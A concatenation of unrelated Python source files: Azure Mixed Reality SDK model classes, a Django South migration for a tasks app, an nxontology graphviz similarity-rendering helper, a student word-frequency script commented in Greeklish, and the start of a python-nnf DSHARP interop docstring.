:param reason: Resource Name To Verify. Possible values include: "Invalid", "AlreadyExists".
:type reason: str or ~mixed_reality_client.models.NameUnavailableReason
:param message: detail message.
:type message: str
"""
_validation = {
'name_available': {'required': True},
}
_attribute_map = {
'name_available': {'key': 'nameAvailable', 'type': 'str'},
'reason': {'key': 'reason', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
}
def __init__(
self,
*,
name_available: Union[str, "NameAvailability"],
reason: Optional[Union[str, "NameUnavailableReason"]] = None,
message: Optional[str] = None,
**kwargs
):
super(CheckNameAvailabilityResponse, self).__init__(**kwargs)
self.name_available = name_available
self.reason = reason
self.message = message
class CloudErrorautogenerated(msrest.serialization.Model):
"""An Error response.
:param error: An error response from Azure.
:type error: ~mixed_reality_client.models.CloudErrorBodyautogenerated
"""
_attribute_map = {
'error': {'key': 'error', 'type': 'CloudErrorBodyautogenerated'},
}
def __init__(
self,
*,
error: Optional["CloudErrorBodyautogenerated"] = None,
**kwargs
):
super(CloudErrorautogenerated, self).__init__(**kwargs)
self.error = error
class CloudErrorBody(msrest.serialization.Model):
"""An error response from Azure.
:param code: An identifier for the error. Codes are invariant and are intended to be consumed
programmatically.
:type code: str
:param message: A message describing the error, intended to be suitable for displaying in a
user interface.
:type message: str
:param target: The target of the particular error. For example, the name of the property in
error.
:type target: str
:param details: A list of additional details about the error.
:type details: list[~mixed_reality_client.models.CloudErrorBody]
"""
_attribute_map = {
'code': {'key': 'code', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
'target': {'key': 'target', 'type': 'str'},
'details': {'key': 'details', 'type': '[CloudErrorBody]'},
}
def __init__(
self,
*,
code: Optional[str] = None,
message: Optional[str] = None,
target: Optional[str] = None,
details: Optional[List["CloudErrorBody"]] = None,
**kwargs
):
super(CloudErrorBody, self).__init__(**kwargs)
self.code = code
self.message = message
self.target = target
self.details = details
class CloudErrorBodyautogenerated(msrest.serialization.Model):
"""An error response from Azure.
:param code: An identifier for the error. Codes are invariant and are intended to be consumed
programmatically.
:type code: str
:param message: A message describing the error, intended to be suitable for displaying in a
user interface.
:type message: str
:param target: The target of the particular error. For example, the name of the property in
error.
:type target: str
:param details: A list of additional details about the error.
:type details: list[~mixed_reality_client.models.CloudErrorBodyautogenerated]
"""
_attribute_map = {
'code': {'key': 'code', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
'target': {'key': 'target', 'type': 'str'},
'details': {'key': 'details', 'type': '[CloudErrorBodyautogenerated]'},
}
def __init__(
self,
*,
code: Optional[str] = None,
message: Optional[str] = None,
target: Optional[str] = None,
details: Optional[List["CloudErrorBodyautogenerated"]] = None,
**kwargs
):
super(CloudErrorBodyautogenerated, self).__init__(**kwargs)
self.code = code
self.message = message
self.target = target
self.details = details
class Identity(msrest.serialization.Model):
"""Identity for the resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar principal_id: The principal ID of resource identity.
:vartype principal_id: str
:ivar tenant_id: The tenant ID of resource.
:vartype tenant_id: str
:ivar type: The identity type. Default value: "SystemAssigned".
:vartype type: str
"""
_validation = {
'principal_id': {'readonly': True},
'tenant_id': {'readonly': True},
'type': {'constant': True},
}
_attribute_map = {
'principal_id': {'key': 'principalId', 'type': 'str'},
'tenant_id': {'key': 'tenantId', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
type = "SystemAssigned"
def __init__(
self,
**kwargs
):
super(Identity, self).__init__(**kwargs)
self.principal_id = None
self.tenant_id = None
class Operation(msrest.serialization.Model):
"""REST API operation.
:param name: Operation name: {provider}/{resource}/{operation}.
:type name: str
:param display: The object that represents the operation.
:type display: ~mixed_reality_client.models.OperationDisplay
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'display': {'key': 'display', 'type': 'OperationDisplay'},
}
def __init__(
self,
*,
name: Optional[str] = None,
display: Optional["OperationDisplay"] = None,
**kwargs
):
super(Operation, self).__init__(**kwargs)
self.name = name
self.display = display
class OperationDisplay(msrest.serialization.Model):
"""The object that represents the operation.
All required parameters must be populated in order to send to Azure.
:param provider: Required. Service provider: Microsoft.ResourceProvider.
:type provider: str
:param resource: Required. Resource on which the operation is performed: Profile, endpoint,
etc.
:type resource: str
:param operation: Required. Operation type: Read, write, delete, etc.
:type operation: str
:param description: Required. Description of operation.
:type description: str
"""
_validation = {
'provider': {'required': True},
'resource': {'required': True},
'operation': {'required': True},
'description': {'required': True},
}
_attribute_map = {
'provider': {'key': 'provider', 'type': 'str'},
'resource': {'key': 'resource', 'type': 'str'},
'operation': {'key': 'operation', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
}
def __init__(
self,
*,
provider: str,
resource: str,
operation: str,
description: str,
**kwargs
):
super(OperationDisplay, self).__init__(**kwargs)
self.provider = provider
self.resource = resource
self.operation = operation
self.description = description
class OperationPage(msrest.serialization.Model):
"""Result of the request to list Resource Provider operations. It contains a list of operations and a URL link to get the next set of results.
:param value: List of operations supported by the Resource Provider.
:type value: list[~mixed_reality_client.models.Operation]
:param next_link: URL to get the next set of operation list results if there are any.
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[Operation]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
*,
value: Optional[List["Operation"]] = None,
next_link: Optional[str] = None,
**kwargs
):
super(OperationPage, self).__init__(**kwargs)
self.value = value
self.next_link = next_link
class Resource(msrest.serialization.Model):
"""Resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource Id for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. Ex- Microsoft.Compute/virtualMachines or
Microsoft.Storage/storageAccounts.
:vartype type: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Resource, self).__init__(**kwargs)
self.id = None
self.name = None
self.type = None
class TrackedResource(Resource):
"""The resource model definition for a ARM tracked top level resource.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar id: Fully qualified resource Id for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. Ex- Microsoft.Compute/virtualMachines or
Microsoft.Storage/storageAccounts.
:vartype type: str
:param tags: A set of tags. Resource tags.
:type tags: dict[str, str]
:param location: Required. The geo-location where the resource lives.
:type location: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'location': {'required': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'location': {'key': 'location', 'type': 'str'},
}
def __init__(
self,
*,
location: str,
tags: Optional[Dict[str, str]] = None,
**kwargs
):
super(TrackedResource, self).__init__(**kwargs)
self.tags = tags
self.location = location
class RemoteRenderingAccount(TrackedResource):
"""RemoteRenderingAccount Response.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar id: Fully qualified resource Id for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. Ex- Microsoft.Compute/virtualMachines or
Microsoft.Storage/storageAccounts.
:vartype type: str
:param tags: A set of tags. Resource tags.
:type tags: dict[str, str]
:param location: Required. The geo-location where the resource lives.
:type location: str
:param identity: Identity for the resource.
:type identity: ~mixed_reality_client.models.Identity
:ivar account_id: unique id of certain account.
:vartype account_id: str
:ivar account_domain: Correspond domain name of certain Spatial Anchors Account.
:vartype account_domain: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'location': {'required': True},
'account_id': {'readonly': True},
'account_domain': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'location': {'key': 'location', 'type': 'str'},
'identity': {'key': 'identity', 'type': 'Identity'},
'account_id': {'key': 'properties.accountId', 'type': 'str'},
'account_domain': {'key': 'properties.accountDomain', 'type': 'str'},
}
def __init__(
self,
*,
location: str,
tags: Optional[Dict[str, str]] = None,
identity: Optional["Identity"] = None,
**kwargs
):
super(RemoteRenderingAccount, self).__init__(tags=tags, location=location, **kwargs)
self.identity = identity
self.account_id = None
self.account_domain = None
class RemoteRenderingAccountIdentity(Identity):
"""RemoteRenderingAccountIdentity.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar principal_id: The principal ID of resource identity.
:vartype principal_id: str
:ivar tenant_id: The tenant ID of resource.
:vartype tenant_id: str
:ivar type: The identity type. Default value: "SystemAssigned".
:vartype type: str
"""
_validation = {
'principal_id': {'readonly': True},
'tenant_id': {'readonly': True},
'type': {'constant': True},
}
_attribute_map = {
'principal_id': {'key': 'principalId', 'type': 'str'},
'tenant_id': {'key': 'tenantId', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
type = "SystemAssigned"
def __init__(
self,
**kwargs
):
super(RemoteRenderingAccountIdentity, self).__init__(**kwargs)
class RemoteRenderingAccountPage(msrest.serialization.Model):
"""Result of the request to get resource collection. It contains a list of resources and a URL link to get the next set of results.
:param value: List of resources supported by the Resource Provider.
:type value: list[~mixed_reality_client.models.RemoteRenderingAccount]
:param next_link: URL to get the next set of resource list results if there are any.
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[RemoteRenderingAccount]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
*,
value: Optional[List["RemoteRenderingAccount"]] = None,
next_link: Optional[str] = None,
**kwargs
):
super(RemoteRenderingAccountPage, self).__init__(**kwargs)
self.value = value
self.next_link = next_link
class SpatialAnchorsAccount(TrackedResource):
"""SpatialAnchorsAccount Response.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar id: Fully qualified resource Id for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. Ex- Microsoft.Compute/virtualMachines or
Microsoft.Storage/storageAccounts.
:vartype type: str
:param tags: A set of tags. Resource tags.
:type tags: dict[str, str]
:param location: Required. The geo-location where the resource lives.
:type location: str
:ivar account_id: unique id of certain account.
:vartype account_id: str
:ivar account_domain: Correspond domain name of certain Spatial Anchors Account.
:vartype account_domain: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'location': {'required': True},
'account_id': {'readonly': True},
'account_domain': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'location': {'key': 'location', 'type': 'str'},
'account_id': {'key': 'properties.accountId', 'type': 'str'},
'account_domain': {'key': 'properties.accountDomain', 'type': 'str'},
}
def __init__(
self,
*,
location: str,
tags: Optional[Dict[str, str]] = None,
**kwargs
):
super(SpatialAnchorsAccount, self).__init__(tags=tags, location=location, **kwargs)
self.account_id = None
self.account_domain = None
class SpatialAnchorsAccountPage(msrest.serialization.Model):
"""Result of the request to get resource collection. It contains a list of resources and a URL link to get the next set of results.
:param value: List of resources supported by the Resource Provider.
:type value: list[~mixed_reality_client.models.SpatialAnchorsAccount]
:param next_link: URL to get the next set of resource list results if there are any.
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[SpatialAnchorsAccount]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
*,
value: Optional[List["SpatialAnchorsAccount"]] = None,
next_link: Optional[str] = None,
**kwargs
):
super(SpatialAnchorsAccountPage, self).__init__(**kwargs)
self.value = value
self.next_link = next_link
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting model 'UserTask'
db.delete_table('tasks_usertask')
# Changing field 'Task.created_by'
db.alter_column('tasks_task', 'created_by_id', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['users.User']))
# Adding M2M table for field user_task on 'Task'
m2m_table_name = db.shorten_name('tasks_task_user_task')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('task', models.ForeignKey(orm['tasks.task'], null=False)),
('user', models.ForeignKey(orm['users.user'], null=False))
))
db.create_unique(m2m_table_name, ['task_id', 'user_id'])
# Deleting field 'Comment.description'
db.delete_column('tasks_comment', 'description')
# Deleting field 'Comment.name'
db.delete_column('tasks_comment', 'name')
# Adding field 'Comment.body'
db.add_column('tasks_comment', 'body',
self.gf('django.db.models.fields.TextField')(default=1),
keep_default=False)
# Changing field 'Comment.user'
db.alter_column('tasks_comment', 'user_id', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['users.User']))
def backwards(self, orm):
# Adding model 'UserTask'
db.create_table('tasks_usertask', (
('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])),
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('completed', self.gf('django.db.models.fields.DateField')(null=True)),
('created', self.gf('django.db.models.fields.DateTimeField')(blank=True, auto_now_add=True)),
('task', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['tasks.Task'])),
('reassigned', self.gf('django.db.models.fields.DateField')(null=True)),
('updated', self.gf('django.db.models.fields.DateTimeField')(blank=True, auto_now=True)),
('removed', self.gf('django.db.models.fields.DateField')(null=True)),
))
db.send_create_signal('tasks', ['UserTask'])
# Changing field 'Task.created_by'
db.alter_column('tasks_task', 'created_by_id', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User']))
# Removing M2M table for field user_task on 'Task'
db.delete_table(db.shorten_name('tasks_task_user_task'))
# Adding field 'Comment.description'
db.add_column('tasks_comment', 'description',
self.gf('django.db.models.fields.TextField')(default=1),
keep_default=False)
# Adding field 'Comment.name'
db.add_column('tasks_comment', 'name',
self.gf('django.db.models.fields.CharField')(max_length=255, default=1),
keep_default=False)
# Deleting field 'Comment.body'
db.delete_column('tasks_comment', 'body')
# Changing field 'Comment.user'
db.alter_column('tasks_comment', 'user_id', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User']))
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'to': "orm['auth.Permission']", 'symmetrical': 'False'})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)", 'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'ordering': "('name',)", 'db_table': "'django_content_type'", 'object_name': 'ContentType'},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'projects.project': {
'Meta': {'object_name': 'Project'},
'created': ('django.db.models.fields.DateTimeField', [], {'blank': 'True', 'auto_now_add': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['users.User']"}),
'description': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'blank': 'True', 'auto_now': 'True'})
},
'tasks.comment': {
'Meta': {'object_name': 'Comment'},
'body': ('django.db.models.fields.TextField', [], {}),
'created': ('django.db.models.fields.DateTimeField', [], {'blank': 'True', 'auto_now_add': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'task': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['tasks.Task']"}),
'updated': ('django.db.models.fields.DateTimeField', [], {'blank': 'True', 'auto_now': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['users.User']"})
},
'tasks.image': {
'Meta': {'object_name': 'Image'},
'created': ('django.db.models.fields.DateTimeField', [], {'blank': 'True', 'auto_now_add': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'task': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['tasks.Task']"}),
'updated': ('django.db.models.fields.DateTimeField', [], {'blank': 'True', 'auto_now': 'True'})
},
'tasks.task': {
'Meta': {'object_name': 'Task', 'ordering': "['-created']"},
'created': ('django.db.models.fields.DateTimeField', [], {'blank': 'True', 'auto_now_add': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['users.User']", 'related_name': "'creator'"}),
'description': ('django.db.models.fields.TextField', [], {}),
'due': ('django.db.models.fields.DateField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'to': "orm['projects.Project']"}),
'status': ('django.db.models.fields.IntegerField', [], {}),
'task_type': ('django.db.models.fields.IntegerField', [], {}),
'updated': ('django.db.models.fields.DateTimeField', [], {'blank': 'True', 'auto_now': 'True'}),
'user_task': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['users.User']", 'symmetrical': 'False'})
},
'users.user': {
'Meta': {'object_name': 'User'},
'avatar': ('django.db.models.fields.files.ImageField', [], {'null': 'True', 'blank': 'True', 'max_length': '100'}),
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'blank': 'True', 'max_length': '75'}),
'first_name': ('django.db.models.fields.CharField', [], {'blank': 'True', 'max_length': '30'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'symmetrical': 'False', 'related_name': "'user_set'", 'to': "orm['auth.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'blank': 'True', 'max_length': '30'}),
'password': ('<PASSWORD>', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'symmetrical': 'False', 'related_name': "'user_set'", 'to': "orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
}
}
complete_apps = ['tasks'] |
<reponame>related-sciences/nxontology
from typing import Dict, Iterable, Optional
from networkx.drawing.nx_agraph import to_agraph
from pygraphviz.agraph import AGraph
from nxontology.ontology import Node, Node_Info, SimilarityIC
def create_similarity_graphviz(
sim: SimilarityIC[Node],
nodes: Optional[Iterable[Node]] = None,
) -> "AGraph":
"""
Create a pygraphviz AGraph to render the similarity subgraph with graphviz.
Works by creating a subgraph in networkx with the relevant nodes.
Then attributes are added to the subgraph to expose the proper metadata
and style information to graphviz. See https://graphviz.org/doc/info/attrs.html.
## Parameters:
- sim: SimilarityIC instance, which also provides access to the underlying nxo/graph.
- nodes: Nodes to include in the subgraph. If None, set to the union of ancestors.
"""
source = sim.node_0
target = sim.node_1
if nodes is None:
nodes = sim.union_ancestors
nodes = set(nodes)
# independent shallow copy: creates new independent attribute dicts
subgraph = sim.nxo.graph.subgraph(nodes).copy()
# node labels and fill/font colors
for node, data in subgraph.nodes(data=True):
data["style"] = "filled"
info = sim.nxo.node_info(node)
data["label"] = (
f"<{info.label}<br/>"
'<font point-size="9">'
f"IC<sub>res</sub> {info.intrinsic_ic_scaled:.2f} · "
f"IC<sub>sán</sub> {info.intrinsic_ic_sanchez_scaled:.2f}"
"</font>>"
)
if info.identifier:
data["tooltip"] = info.identifier
if info.url:
data["URL"] = info.url
scaled_ic = getattr(info, sim.ic_metric_scaled)
data["fillcolor"] = get_hex_color(scaled_ic)
data["fontcolor"] = "#ffffff" if scaled_ic > 0.7 else "#000000"
# node styles
for node in nodes - sim.union_ancestors:
# subgraph.nodes[node]["style"] += ",invis"
subgraph.nodes[node]["penwidth"] = 0.0
# disjoint ancestors excluding source & target style
for node in nodes & sim.union_ancestors - sim.common_ancestors - {source, target}:
subgraph.nodes[node]["style"] += ",dotted"
# common ancestors style
for node in nodes & sim.common_ancestors:
subgraph.nodes[node]["style"] += ",solid"
if sim.mica:
subgraph.nodes[sim.mica]["penwidth"] = 2.5
# source and target style
for node in nodes & {source, target}:
subgraph.nodes[node]["style"] += ",dashed"
subgraph.nodes[node]["penwidth"] = 2.5
# title
ic_abbr = {"intrinsic_ic": "res", "intrinsic_ic_sanchez": "sán"}[sim.ic_metric]
source_verbose_label = get_verbose_node_label(sim.info_0)
target_verbose_label = get_verbose_node_label(sim.info_1)
subgraph_name = f"{sim.nxo.name} subgraph" if sim.nxo.name else "Subgraph"
subgraph.graph["label"] = (
f"<{subgraph_name} with ancestors of {source_verbose_label} and {target_verbose_label}. "
f"Similarity: common ancestors = {sim.n_common_ancestors}, union ancestors = {sim.n_union_ancestors}, Lin<sub>{ic_abbr}</sub> = {sim.lin:.2f}>"
)
subgraph.graph["labelloc"] = "t"
# raster resolution
subgraph.graph["dpi"] = 125
gviz = to_agraph(subgraph)
gviz.layout("dot")
return gviz
def get_verbose_node_label(info: Node_Info[Node]) -> str:
"""Return verbose label like 'label (identifier)'."""
verbose_label = info.label
assert isinstance(verbose_label, str)
if info.identifier:
verbose_label += f" ({info.identifier})"
return verbose_label
colormap: Dict[int, str] = {
0: "#f7fcf5",
1: "#f6fcf4",
2: "#f4fbf2",
3: "#f3faf0",
4: "#f1faee",
5: "#f0f9ed",
6: "#eff9eb",
7: "#edf8ea",
8: "#ecf8e8",
9: "#eaf7e6",
10: "#e9f7e5",
11: "#e7f6e3",
12: "#e6f5e1",
13: "#e4f5df",
14: "#e2f4dd",
15: "#dff3da",
16: "#ddf2d8",
17: "#dbf1d5",
18: "#d8f0d2",
19: "#d6efd0",
20: "#d3eecd",
21: "#d1edcb",
22: "#ceecc8",
23: "#ccebc6",
24: "#caeac3",
25: "#c7e9c0",
26: "#c4e8bd",
27: "#c1e6ba",
28: "#bee5b8",
29: "#bbe4b4",
30: "#b8e3b2",
31: "#b5e1ae",
32: "#b2e0ac",
33: "#afdfa8",
34: "#abdda5",
35: "#a9dca3",
36: "#a5db9f",
37: "#a3da9d",
38: "#9fd899",
39: "#9cd797",
40: "#98d594",
41: "#95d391",
42: "#91d28e",
43: "#8dd08a",
44: "#8ace88",
45: "#86cc85",
46: "#83cb82",
47: "#7fc97f",
48: "#7cc87c",
49: "#78c679",
50: "#73c476",
51: "#70c274",
52: "#6bc072",
53: "#68be70",
54: "#63bc6e",
55: "#60ba6c",
56: "#5bb86a",
57: "#58b668",
58: "#53b466",
59: "#4eb264",
60: "#4bb062",
61: "#46ae60",
62: "#43ac5e",
63: "#3fa95c",
64: "#3ea75a",
65: "#3ba458",
66: "#39a257",
67: "#369f54",
68: "#339c52",
69: "#319a50",
70: "#2f974e",
71: "#2d954d",
72: "#2a924a",
73: "#289049",
74: "#258d47",
75: "#228a44",
76: "#208843",
77: "#1d8640",
78: "#1a843f",
79: "#17813d",
80: "#157f3b",
81: "#127c39",
82: "#107a37",
83: "#0c7735",
84: "#097532",
85: "#077331",
86: "#03702e",
87: "#016e2d",
88: "#006b2b",
89: "#00682a",
90: "#006428",
91: "#006227",
92: "#005e26",
93: "#005a24",
94: "#005723",
95: "#005321",
96: "#005120",
97: "#004d1f",
98: "#004a1e",
99: "#00471c",
100: "#00441b",
}
"""
Colormap of greens. Generated from the following code:
```python
import matplotlib.pyplot as plt
from matplotlib.colors import to_hex
# https://matplotlib.org/examples/color/colormaps_reference.html
colormap: "matplotlib.colors.LinearSegmentedColormap" = plt.cm.Greens
{x: to_hex(colormap(x / 100)) for x in range(0, 101)}
```
Generation code for colormap not included to keep dependencies light.
"""
def get_hex_color(x: float) -> str:
"""Return a hex-encoded color like '#rrggbb' for a float between 0.0 and 1.0."""
if not 0.0 <= x <= 1.0:
raise ValueError(f"x must be between 0.0 and 1.0: got {x}")
return colormap[round(100 * x)]
|
<filename>ask5.py
import string,re
#xrishmopoihsa to arxeio license.txt dioti to tales of two cities.txt ekane poly ora sto laptop mou na bgalei apotelesma(pano apo 2 ores),oi le3eis pou emfanizotan perissotero kai h suxnothta tous jtan oi e3hs: 1.the 8241 2.and 5071 3.of 4143 4.to 3653 5.a 3017 6.in 2665 7.it 2082 8.his 2011 9.i 1990 10.that 1956
f = open("LICENSE.txt")
new = f.read()
f.close()
new = new.lower()
kai = re.sub(r'[^a-z ]+', ' ', new)
data = kai.split()#dhmiourgo lista me ka8e le3h afou prota exo epe3ergastei to keimeno
#arxikopoio tis metablhtes pou 8a mpoun oi 10 dhmofhlesteres le3eis kai ta sum tous
le3h1 = ""
le3h2 = ""
le3h3 = ""
le3h4 = ""
le3h5 = ""
le3h6 = ""
le3h7 = ""
le3h8 = ""
le3h9 = ""
le3h10 = ""
sum1 = 0
sum2 = 0
sum3 = 0
sum4 = 0
sum5 = 0
sum6 = 0
sum7 = 0
sum8 = 0
sum9 = 0
sum10 = 0
#arxikopoio tis metablhtes pou 8a mpoun oi 3 protoi sundiasmoi ton 2 proton grammaton pou arxizoun oi perissoteres le3eis
f2le1 = ""
f2le2 = ""
f3l3 = ""
sumf2le1 = 0
sumf2le2 = 0
sumf2le3 = 0
#arxikopoio tis metablhtes pou 8a mpoun oi 3 protoi sundiasmoi ton 3 proton grammaton pou arxizoun oi perissoteres le3eis
f3le1 = ""
f3le2 = ""
f3le3 = ""
sumf3le1 = 0
sumf3le2 = 0
sumf3le3 = 0
stoixeia = len(data)
for i in range(0,stoixeia):
#arxikopoio ta sum kai tis metablhtes bazontas sthn ka8e mia le3eis pou kai tis sullabes pou 8a epanalambanontai
sum2f = 0
sum3f = 0
sumf = 0
le3h = data[i]
le2 = le3h[:2]
le3 = le3h[:3]
for w in range(0,stoixeia):
if le2 == data[w][:2] and len(le2) == 2 :
sum2f += 1
if le3 == data[w][:3] and len(le3) == 3:
sum3f +=1
if le3h == data[w]:
sumf += 1
if sum1<=sumf :
sum1 = sumf
le3h1 = le3h
elif sum2<=sumf :
sum2 = sumf
le3h2 = le3h
elif sum3<=sumf :
sum3 = sumf
le3h3 = le3h
elif sum4<=sumf:
sum4 = sumf
le3h4 = le3h
elif sum5<=sumf :
le3h5 = le3h
sum5 = sumf
elif sum6<=sumf:
le3h6 = le3h
sum6 = sumf
elif sum7<=sumf:
sum7 = sumf
le3h7 = le3h
elif sum8<=sumf:
sum8 = sumf
le3h8 = le3h
elif sum9<=sumf:
sum9 = sumf
le3h9 = le3h
elif sum10<=sumf:
sum10 = sumf
le3h10 = le3h
if sum2f>=sumf2le1 :
f2le1 = le2
sumf2le1 = sum2f
elif sum2f>=sumf2le2:
f2le2 = le2
sumf2le2 = sum2f
elif sum2f>=sumf2le3:
f2le3 = le2
sumf2le3 = sum2f
if sum3f>=sumf3le1:
f3le1 = le3
sumf3le1 = sum3f
elif sum3f>=sumf3le2:
f3le2 = le3
sumf3le2 = sum3f
elif sum3f>=sumf3le3:
f3le3 = le3
sumf3le3 = sum3f
print("oi deka dhmofilesteres le3eis einai:",le3h1,",",le3h2,",",le3h3,",",le3h4,",",le3h5,",",le3h6,",",le3h7,",",le3h8,",",le3h9,",",le3h10)
print("oi 3 protoi sundiasmoi ton 2 proton grammaton pou arxizoun oi perissoteres le3eis einai:",f2le1,",",f2le2,",",f2le3)
print("oi 3 protoi sundiasmoi ton 3 proton grammaton pou arxizoun oi perissoteres le3eis einai:",f3le1,",",f3le2,",",f3le3)
|
<reponame>vishalbelsare/python-nnf
"""Interoperability with `DSHARP <https://github.com/QuMuLab/dsharp>`_.
``load`` and ``loads`` can be used to parse files created by DSHARP's
``-Fnnf`` option.
``compile`` invokes DSHARP directly to compile a sentence. This requires
having DSHARP installed.
The parser was derived by studying DSHARP's output and source code. This
format might be some sort of established standard, in which case this
parser might reject or misinterpret some valid files in the format.
DSHARP may not work properly for some (usually trivially) unsatisfiable
sentences, incorrectly reporting there's a solution. This bug dates back to
sharpSAT, on which DSHARP was based:
